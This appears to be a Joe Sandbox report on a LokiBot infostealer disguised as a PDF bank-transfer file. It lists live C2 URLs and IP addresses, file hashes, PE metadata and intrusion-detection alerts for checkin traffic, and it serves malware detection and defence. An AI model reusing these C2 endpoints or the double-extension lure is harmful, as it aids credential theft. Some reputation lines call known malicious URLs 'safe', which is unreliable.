                  http://www.goodfont.co.kr0%URL Reputationsafe
                  http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                  http://www.carterandcone.coml0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.sajatypeworks.com0%URL Reputationsafe
                  http://www.typography.netD0%URL Reputationsafe
                  http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                  http://fontfabrik.com0%URL Reputationsafe
                  http://www.founder.com.cn/cn0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.sandoll.co.kr0%URL Reputationsafe
                  http://www.urwpp.deDPlease0%URL Reputationsafe
                  http://www.zhongyicts.com.cn0%URL Reputationsafe
                  http://www.sakkal.com0%URL Reputationsafe
                  http://sempersim.su/gl21/fre.php0%Avira URL Cloudsafe
                  http://sempersim.su/gl21/fre.php19%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  sempersim.su
                  91.142.77.45
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: safe
                  unknown
                  http://sempersim.su/gl21/fre.phptrue
                  • 19%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.apache.org/licenses/LICENSE-2.0transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.fontbureau.com/designersGtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.fontbureau.com/designers/?transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/bThetransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers?transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.ibsensoftware.com/transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.tiro.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designerstransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.goodfont.co.krtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.comltransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.sajatypeworks.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.typography.netDtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.fontbureau.com/designers/cabarga.htmlNtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/cThetransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.galapagosdesign.com/staff/dennis.htmtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://fontfabrik.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.founder.com.cn/cntransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.fontbureau.com/designers/frere-jones.htmltransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.jiyu-kobo.co.jp/transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleasetransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers8transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fonts.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.sandoll.co.krtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleasetransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cntransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.sakkal.comtransferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      91.142.77.45
                                      sempersim.suRussian Federation
                                      48720VTSL1-ASRUtrue
                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                      Analysis ID:736955
                                      Start date and time:2022-11-03 12:28:50 +01:00
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 7m 37s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:transferencia bancaria.pdf.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@3/3@40/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 22
                                      • Number of non-executed functions: 3
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      TimeTypeDescription
                                      12:29:57API Interceptor38x Sleep call for process: transferencia bancaria.pdf.exe modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      91.142.77.45KAu0Fx0eB8.exeGet hashmaliciousBrowse
                                      • sempersim.su/gl16/fre.php
                                      a9U6A1R0Eg.exeGet hashmaliciousBrowse
                                      • sempersim.su/gk22/fre.php
                                      JJT-15743SGN DEBIT NTOE FOR 5 CTNS_PDF.exeGet hashmaliciousBrowse
                                      • sempersim.su/gk22/fre.php
                                      transferencia bancaria..exeGet hashmaliciousBrowse
                                      • sempersim.su/gl3/fre.php
                                      DOC_PI20220817.pdf.exeGet hashmaliciousBrowse
                                      • sempersim.su/gl2/fre.php
                                      RFQ0220904Mayr.exeGet hashmaliciousBrowse
                                      • sempersim.su/gl20/fre.php
                                      PI_220800035_SOA_OCT_2022.pdf.exeGet hashmaliciousBrowse
                                      • sempersim.su/gl2/fre.php
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      sempersim.suKAu0Fx0eB8.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      a9U6A1R0Eg.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      JJT-15743SGN DEBIT NTOE FOR 5 CTNS_PDF.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      transferencia bancaria..exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      DOC_PI20220817.pdf.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      RFQ0220904Mayr.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      PI_220800035_SOA_OCT_2022.pdf.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      Statement of Account.pdf.exeGet hashmaliciousBrowse
                                      • 87.251.79.65
                                      file.exeGet hashmaliciousBrowse
                                      • 87.251.79.195
                                      SecuriteInfo.com.Win32.PWSX-gen.726.17024.exeGet hashmaliciousBrowse
                                      • 87.251.79.195
                                      LHNz9uEDyrigqri.exeGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      RbvMuEnOJj.exeGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      E9WYnPSSnp.exeGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      ziiuewirisdfjhfjh.docGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      zziiuewirisdfjhfjh.docGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      vbc.exeGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      dS8nI2FGb6.exeGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      BPpOypeeME.exeGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      GFCmQMox5MpE7RD.exeGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      13-10-2022_______________Remittance copy.exeGet hashmaliciousBrowse
                                      • 193.233.204.84
                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      VTSL1-ASRUKAu0Fx0eB8.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      a9U6A1R0Eg.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      JJT-15743SGN DEBIT NTOE FOR 5 CTNS_PDF.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      transferencia bancaria..exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      DOC_PI20220817.pdf.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      RFQ0220904Mayr.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      PI_220800035_SOA_OCT_2022.pdf.exeGet hashmaliciousBrowse
                                      • 91.142.77.45
                                      file.exeGet hashmaliciousBrowse
                                      • 91.142.79.192
                                      mistershut,file,08.06.22.docGet hashmaliciousBrowse
                                      • 91.142.79.204
                                      masia.file.08.06.docGet hashmaliciousBrowse
                                      • 91.142.79.204
                                      ireplace-file-08.06.22.docGet hashmaliciousBrowse
                                      • 91.142.79.204
                                      pastagentile,file,08.06.22.docGet hashmaliciousBrowse
                                      • 91.142.79.204
                                      SMIEC_MARCH_SOA_SHIPMENT_TT_SLIP_pdf.exeGet hashmaliciousBrowse
                                      • 91.142.79.80
                                      SMIEC_MARCH_SOA_SHIPMENT_TT_SLIP_pdf.exeGet hashmaliciousBrowse
                                      • 91.142.79.80
                                      MV NORDPUMA.xlsxGet hashmaliciousBrowse
                                      • 91.142.79.80
                                      iwMxkCxA73.exeGet hashmaliciousBrowse
                                      • 91.142.79.80
                                      8pJFGILBYe.exeGet hashmaliciousBrowse
                                      • 91.142.78.221
                                      uOItzWogCB.exeGet hashmaliciousBrowse
                                      • 91.142.78.221
                                      flstudio_win_20.8.2.1863.exeGet hashmaliciousBrowse
                                      • 91.142.78.221
                                      5502146fcab8739ffd8de25a8ae6656058ec0da0a5f12.exeGet hashmaliciousBrowse
                                      • 91.142.78.221
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.355304211458859
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                      MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                      SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                      SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                      SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                      Process:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      File Type:very short file (no magic)
                                      Category:dropped
                                      Size (bytes):1
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3:U:U
                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1
                                      Process:C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):49
                                      Entropy (8bit):0.0
                                      Encrypted:false
                                      SSDEEP:3::
                                      MD5:884BB48A55DA67B4812805CB8905277D
                                      SHA1:6B3D33E00F5B9DEAE2826F80644CB4F6E78B7401
                                      SHA-256:78877FA898F0B4C45C9C33AE941E40617AD7C8657A307DB62BC5691F92F4F60E
                                      SHA-512:989A38778FC961EB2C79E70621EABFB4B22D6537F08A71359B27AF495646E304EE252A523769F66B75BC2FAF546ACB22A71B358B51221174AC0D964DA7A62821
                                      Malicious:false
                                      Reputation:moderate, very likely benign file
                                      Preview:.................................................
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):6.908301217464369
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:transferencia bancaria.pdf.exe
                                      File size:811008
                                      MD5:355efb2e1f7dd361f8e7cda449a45eac
                                      SHA1:864f8d367c72d37347e2dc8fa799cc9a2550d66c
                                      SHA256:cb90ea9b90ccb675d555891bcbfb224edf1bbfe7a650e9600508c93660ec09eb
                                      SHA512:696a0d695e86094c35abf41001c607fa3df61bbf5cb7bf11feadd4bd434a67ce31628106c71688e8782f4e326e71aaced83b031764c4214832df455329edc8c5
                                      SSDEEP:12288:dR/AN9w7DTIJ0ycSou3KRdwHDI3tRG/8wSRDfs2sFLTAehm8buS89W:3XXEyycSDAwHNi8TAqbD
                                      TLSH:8005E00F8AE6460ED66936B865F0EFB75799DC01F44BC35B17CA6E4BB8432308211BD9
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|#...............0..X...........v... ........@.. ....................................@................................
                                      Icon Hash:00828e8e8686b000
                                      Entrypoint:0x4c761e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xA9237CA5 [Wed Dec 3 11:06:13 2059 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc75cc0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x370.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xc75b00x1c.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000xc56240xc5800False0.712665644778481data6.915983824184794IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc0xc80000x3700x400False0.365234375data2.7841237517285475IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0xca0000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountry
                                      RT_VERSION0xc80580x314data
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      192.168.2.691.142.77.4549712802024318 11/03/22-12:30:22.162497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971280192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549727802024313 11/03/22-12:31:01.987085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549723802825766 11/03/22-12:30:53.367985TCP2825766ETPRO TROJAN LokiBot Checkin M24972380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549724802021641 11/03/22-12:30:54.913991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972480192.168.2.691.142.77.45
                                      192.168.2.68.8.8.859881532014169 11/03/22-12:31:01.170102UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5988153192.168.2.68.8.8.8
                                      192.168.2.68.8.8.856122532014169 11/03/22-12:30:45.704907UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5612253192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549741802825766 11/03/22-12:31:39.946873TCP2825766ETPRO TROJAN LokiBot Checkin M24974180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549745802024313 11/03/22-12:31:50.569101TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549728802025381 11/03/22-12:31:03.903902TCP2025381ET TROJAN LokiBot Checkin4972880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549739802021641 11/03/22-12:31:35.606377TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549738802825766 11/03/22-12:31:33.019427TCP2825766ETPRO TROJAN LokiBot Checkin M24973880192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802025381 11/03/22-12:30:25.414440TCP2025381ET TROJAN LokiBot Checkin4971380192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549731802025381 11/03/22-12:31:09.511791TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549737802024318 11/03/22-12:31:31.046497TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549713802825766 11/03/22-12:30:25.414440TCP2825766ETPRO TROJAN LokiBot Checkin M24971380192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497182025483 11/03/22-12:30:41.067853TCP2025483ET TROJAN LokiBot Fake 404 Response804971891.142.77.45192.168.2.6
                                      91.142.77.45192.168.2.680497092025483 11/03/22-12:30:17.656419TCP2025483ET TROJAN LokiBot Fake 404 Response804970991.142.77.45192.168.2.6
                                      192.168.2.68.8.8.850343532014169 11/03/22-12:31:05.602892UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5034353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549717802024318 11/03/22-12:30:35.019960TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971780192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549717802024313 11/03/22-12:30:35.019960TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971780192.168.2.691.142.77.45
                                      192.168.2.68.8.8.856569532014169 11/03/22-12:31:22.519121UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5656953192.168.2.68.8.8.8
                                      91.142.77.45192.168.2.680497122025483 11/03/22-12:30:23.556931TCP2025483ET TROJAN LokiBot Fake 404 Response804971291.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549729802021641 11/03/22-12:31:05.707382TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972980192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549742802021641 11/03/22-12:31:41.893270TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974280192.168.2.691.142.77.45
                                      192.168.2.68.8.8.853943532014169 11/03/22-12:30:54.819244UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5394353192.168.2.68.8.8.8
                                      192.168.2.691.142.77.4549730802024318 11/03/22-12:31:07.626823TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973080192.168.2.691.142.77.45
                                      91.142.77.45192.168.2.680497102025483 11/03/22-12:30:19.791139TCP2025483ET TROJAN LokiBot Fake 404 Response804971091.142.77.45192.168.2.6
                                      192.168.2.691.142.77.4549735802024313 11/03/22-12:31:27.516452TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.691.142.77.45
                                      192.168.2.691.142.77.4549721802025381 11/03/22-12:30:48.032802TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.691.142.77.45
                                      192.168.2.68.8.8.855629532014169 11/03/22-12:31:09.419344UDP2014169ET DNS Query for .su TLD (Soviet Union) Often Malware Related5562953192.168.2.68.8.8.8
